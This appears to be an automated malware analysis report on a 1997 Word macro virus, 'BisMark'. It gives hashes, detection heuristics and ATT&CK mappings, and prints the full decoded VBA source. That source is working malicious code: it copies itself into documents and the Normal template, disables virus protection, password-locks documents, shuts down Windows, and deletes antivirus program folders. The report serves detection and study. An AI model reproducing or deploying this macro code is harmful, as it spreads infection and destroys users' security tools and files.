Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9b2fdc88371e524…

MALICIOUS

Office (OLE)

53.5 KB Created: 1997-08-04 11:44:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1654f1feb26e551bf4a431fe22494e59 SHA-1: a09d52d2d67a522ed8198a51f2274580b395c366 SHA-256: f9b2fdc88371e5247640279a8bee56b35018f00a031e42de38985cbd8d5dd616
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a legacy Word document containing VBA macros, including AutoOpen and Auto_Close, which are indicative of malicious intent. The macros attempt to copy themselves to the active document and the Normal template, suggesting an effort to achieve persistence. The ClamAV detection as 'Doc.Trojan.Bismark-1' further supports its malicious nature. The specific macro name 'BisMark' is included as an IOC.

Heuristics 5

  • ClamAV: Doc.Trojan.Bismark-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Bismark-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3886 bytes
SHA-256: ecd2ad869d9c44c9cb264b3b18b4bf7e6bedd5a31435c8094a038f574722e24a
Detection
ClamAV: Doc.Trojan.Bismark-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "BisMark"
Sub AutoOpen()
On Error GoTo BisMark

    Application.ScreenUpdating = False
    Application.DisplayAlerts = wdAlertsNone

    WordBasic.DisableAutoMacros 0
    Options.VirusProtection = False

    Set ActiveDoc = ActiveDocument
    Set GlobalDoc = NormalTemplate

    documentinstalled = False
    Globalinstalled = False

    For I = 1 To ActiveDocument.VBProject.VBComponents.Count
        If ActiveDocument.VBProject.VBComponents(I).Name = "BisMark" Then
            documentinstalled = True
        End If
   Next
  
   For J = 1 To NormalTemplate.VBProject.VBComponents.Count
        If NormalTemplate.VBProject.VBComponents(J).Name = "BisMark" Then
            Globalinstalled = True
        End If
    Next

    If documentinstalled = False Then
        Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        ActiveDoc.SaveAs FileName:=ActiveDoc.Name, FileFormat:=wdFormatTemplate
        
    End If

    If Globalinstalled = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="BisMark", Object:=wdOrganizerObjectProjectItems
        Options.SaveNormalPrompt = False
        
    End If

    Application.DisplayAlerts = wdAlertsAll

BisMark:
BisMark
End Sub
Sub BisMark()
On Error GoTo BisMark
Application.StatusBar = True
StatusBar = "BisMark1 WMV97"
Application.Caption = "BisMark1 WMV97"
With ActiveDocument
.BuiltInDocumentProperties(wdPropertyTitle) = "BisMark1"
.BuiltInDocumentProperties(wdPropertySubject) = "Word Macro Virri"
.BuiltInDocumentProperties(wdPropertyAuthor) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyManager) = "Talon 1997"
.BuiltInDocumentProperties(wdPropertyCompany) = "Virii Productions"
.BuiltInDocumentProperties(wdPropertyComments) = "This Word Macro Virus was Made By Talon"
End With
If WeekDay(Now()) = 4 And Hour(Now()) = 12 Then
AutoCorrect.Entries.Add Name:="the", Value:="Word Macro Virus BisMark1, Written By Talon"
Else
End If
BisMark:
End Sub

Sub ToolsMacro()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub Toolscustomize()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub ViewVBcode()
On Error GoTo BisMark
ActiveDocument.Password = "Bismark"
Documents.Close SaveChanges:=wdSaveChanges

Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "You Should Have Left Me Alone, I Was Not Hurting Anything. Now I'am Mad!"
.Heading = "Word Macro Virus BisMark 97"
.Animation = msoAnimationSearching
.Show
End With
Tasks.ExitWindows

BisMark:
End Sub
Sub AutoClose()
On Error Resume Next
Kill "c:\program files\norton antivirus\*.*"
Kill "c:\vdoc\*.*"
Kill "c:\f-prot\*.*"
Kill "C:\program files\antiviral toolkit pro\*.*"
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.